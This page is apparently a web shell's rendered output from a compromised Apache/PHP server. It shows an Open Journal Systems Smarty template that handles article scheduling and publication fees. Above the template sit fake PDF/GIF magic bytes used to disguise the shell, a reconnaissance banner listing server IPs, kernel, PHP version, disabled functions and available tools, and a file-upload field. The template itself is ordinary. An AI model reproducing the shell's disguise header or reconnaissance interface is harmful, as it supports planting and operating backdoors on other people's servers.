%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/templates/sectionEditor/submission/ |
Upload File : |
{**
* templates/sectionEditor/submission/scheduling.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Subtemplate defining the scheduling table.
*
*}
<div id="scheduling">
<h3>{translate key="submission.scheduling"}</h3>
<table class="data" width="100%">
{if !$publicationFeeEnabled || $publicationPayment}
<form action="{url op="scheduleForPublication" path=$submission->getId()}" method="post">
<tr valign="top">
<td width="25%" class="label">
<label for="issueId">{translate key="editor.article.scheduleForPublication"}</label>
</td>
<td width="25%" class="value">
{if $publishedArticle}
{assign var=issueId value=$publishedArticle->getIssueId()}
{else}
{assign var=issueId value=0}
{/if}
<select name="issueId" id="issueId" class="selectMenu">
<option value="">{translate key="editor.article.scheduleForPublication.toBeAssigned"}</option>
{html_options options=$issueOptions|truncate:40:"..." selected=$issueId}
</select>
</td>
<td width="50%" class="value">
<input type="submit" value="{translate key="common.record"}" class="button defaultButton" />
{if $issueId}
{if $isEditor}
<a href="{url page="editor" op="issueToc" path=$issueId}" class="action">{translate key="issue.toc"}</a>
{else}
<a href="{url page="issue" op="view" path=$issueId}" class="action">{translate key="issue.toc"}</a>
{/if}
{/if}
</td>
</tr>
</form>
{if $publishedArticle}
<form action="{url op="setDatePublished" path=$submission->getId()}" method="post">
<tr valign="top">
<td width="20%" class="label">
<label for="issueId">{translate key="editor.issues.published"}</label>
</td>
<td class="value">
{* Find good values for starting and ending year options *}
{assign var=currentYear value=$smarty.now|date_format:"%Y"}
{if $publishedArticle->getDatePublished()}
{assign var=publishedYear value=$publishedArticle->getDatePublished()|date_format:"%Y"}
{math|assign:"minYear" equation="min(x,y)-10" x=$publishedYear y=$currentYear}
{math|assign:"maxYear" equation="max(x,y)+2" x=$publishedYear y=$currentYear}
{else}
{* No issue publication date info *}
{math|assign:"minYear" equation="x-10" x=$currentYear}
{math|assign:"maxYear" equation="x+2" x=$currentYear}
{/if}
{html_select_date prefix="datePublished" time=$publishedArticle->getDatePublished()|default:"---" all_extra="class=\"selectMenu\"" start_year=$minYear end_year=$maxYear year_empty="-" month_empty="-" day_empty="-"}
</td>
<td class="value">
<input type="submit" value="{translate key="common.record"}" class="button defaultButton" />
</td>
</tr>
</form>
{/if}{* $publishedArticle *}
{else}
<tr>
<td>{translate key="editor.article.payment.publicationFeeNotPaid"}</td>
<td align="right">
<form action="{url op="waivePublicationFee" path=$submission->getId()}" method="post">
<input type="hidden" name="markAsPaid" value=1 />
<input type="hidden" name="sendToScheduling" value=1 />
<input type="submit" value="{translate key="payment.paymentReceived"}" class="button defaultButton" />
</form>
</td>
{if $isEditor}
<td align="left">
<form action="{url page="editor" op="waivePublicationFee" path=$submission->getId()}" method="post">
<input type="hidden" name="sendToScheduling" value=1 />
<input type="submit" value="{translate key="payment.waive"}" class="button defaultButton" />
</form>
</td>
{/if}
</tr>
{/if}
</table>
</div>